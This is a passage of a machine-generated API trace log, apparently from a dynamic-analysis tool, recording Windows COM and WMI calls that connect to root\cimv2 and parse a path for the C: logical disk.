ppvObject=0x6cee3c4*=0x67387e0) returned 0x0 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0205.687] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0205.687] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x9820f18) returned 0x0 [0205.688] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820f18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.688] WbemDefPath:IUnknown:Release (This=0x9820f18) returned 0x3 [0205.688] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0205.688] CoGetContextToken (in: pToken=0x6cedca8 | out: pToken=0x6cedca8) returned 0x0 [0205.688] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0205.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0205.688] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0205.688] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0205.688] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0205.688] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0205.688] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x67387e0) returned 0x0 [0205.688] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0205.688] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0205.688] WbemDefPath:IWbemPath:SetText (This=0x67387e0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0205.688] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.689] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0205.689] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0205.689] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0205.689] IUnknown:Release (This=0x72015c) returned 0x1 [0205.689] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6736f38) returned 0x0 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f38, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0205.690] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f38, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738850) returned 0x0 [0205.690] WbemDefPath:IUnknown:Release (This=0x6736f38) returned 0x0 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738850) returned 0x0 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0205.690] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x9820f38) returned 0x0 [0205.690] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820f38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.690] WbemDefPath:IUnknown:Release (This=0x9820f38) returned 0x3 [0205.690] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0205.690] CoGetContextToken (in: pToken=0x6cedbf0 | out: pToken=0x6cedbf0) returned 0x0 [0205.690] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0205.690] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0205.690] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0205.690] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0205.690] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0205.690] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738850) returned 0x0 [0205.690] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0205.691] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0205.691] WbemDefPath:IWbemPath:SetText (This=0x6738850, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0205.691] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0205.691] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0205.691] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.691] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0205.691] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0205.691] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0205.691] IUnknown:Release (This=0x72015c) returned 0x1 [0205.691] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f4c0) returned 0x0 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x672f4c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0205.692] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f4c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6737038) returned 0x0 [0205.692] WbemLocator:IUnknown:Release (This=0x672f4c0) returned 0x0 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6737038) returned 0x0 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0205.692] WbemLocator:IUnknown:AddRef (This=0x6737038) returned 0x3 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0205.692] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0205.692] CoGetContextToken (in: pToken=0x6ceded0 | out: pToken=0x6ceded0) returned 0x0 [0205.692] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0205.692] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0205.692] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x2 [0205.693] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x1 [0205.693] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0205.693] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0205.693] WbemLocator:IUnknown:QueryInterface (in: This=0x6737038, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6737038) returned 0x0 [0205.693] WbemLocator:IUnknown:AddRef (This=0x6737038) returned 0x3 [0205.693] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x2 [0205.693] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0205.693] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0205.693] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.693] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6736e38) returned 0x0 [0205.693] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e38, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x6747ffc) returned 0x0 [0209.869] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781ea4) returned 0x0 [0209.869] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ea4, pProxy=0x6747ffc, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0209.869] WbemLocator:IUnknown:Release (This=0x781ea4) returned 0x1 [0209.869] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781ec4) returned 0x0 [0209.869] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781ea4) returned 0x0 [0209.869] WbemLocator:IClientSecurity:SetBlanket (This=0x781ea4, pProxy=0x6747ffc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0209.870] WbemLocator:IUnknown:Release (This=0x781ea4) returned 0x2 [0209.870] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x1 [0209.870] CoTaskMemFree (pv=0x77dde8) [0209.870] WbemLocator:IUnknown:Release (This=0x6736e38) returned 0x0 [0209.870] WbemLocator:IUnknown:QueryInterface (in: This=0x6747ffc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781ec4) returned 0x0 [0209.870] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0209.871] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0209.872] WbemLocator:IUnknown:AddRef (This=0x781ec4) returned 0x3 [0209.872] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0209.873] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0209.875] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781e24) returned 0x0 [0209.875] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781e24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0209.875] WbemLocator:IUnknown:Release (This=0x781e24) returned 0x3 [0209.875] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0209.876] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0209.876] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x781eac) returned 0x0 [0209.876] WbemLocator:IRpcOptions:Query (in: This=0x781eac, pPrx=0x781ec4, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0209.876] WbemLocator:IUnknown:Release (This=0x781eac) returned 0x3 [0209.876] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x2 [0209.876] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0209.876] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0209.876] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x6747ffc) returned 0x0 [0209.876] WbemLocator:IUnknown:AddRef (This=0x6747ffc) returned 0x4 [0209.876] WbemLocator:IUnknown:Release (This=0x6747ffc) returned 0x3 [0209.876] WbemLocator:IUnknown:Release (This=0x6747ffc) returned 0x2 [0209.876] SysStringLen (param_1=0x0) returned 0x0 [0209.876] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0209.876] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0209.876] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0209.876] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0209.876] WbemLocator:IUnknown:AddRef (This=0x781ec4) returned 0x3 [0209.876] WbemLocator:IUnknown:QueryInterface (in: This=0x781ec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 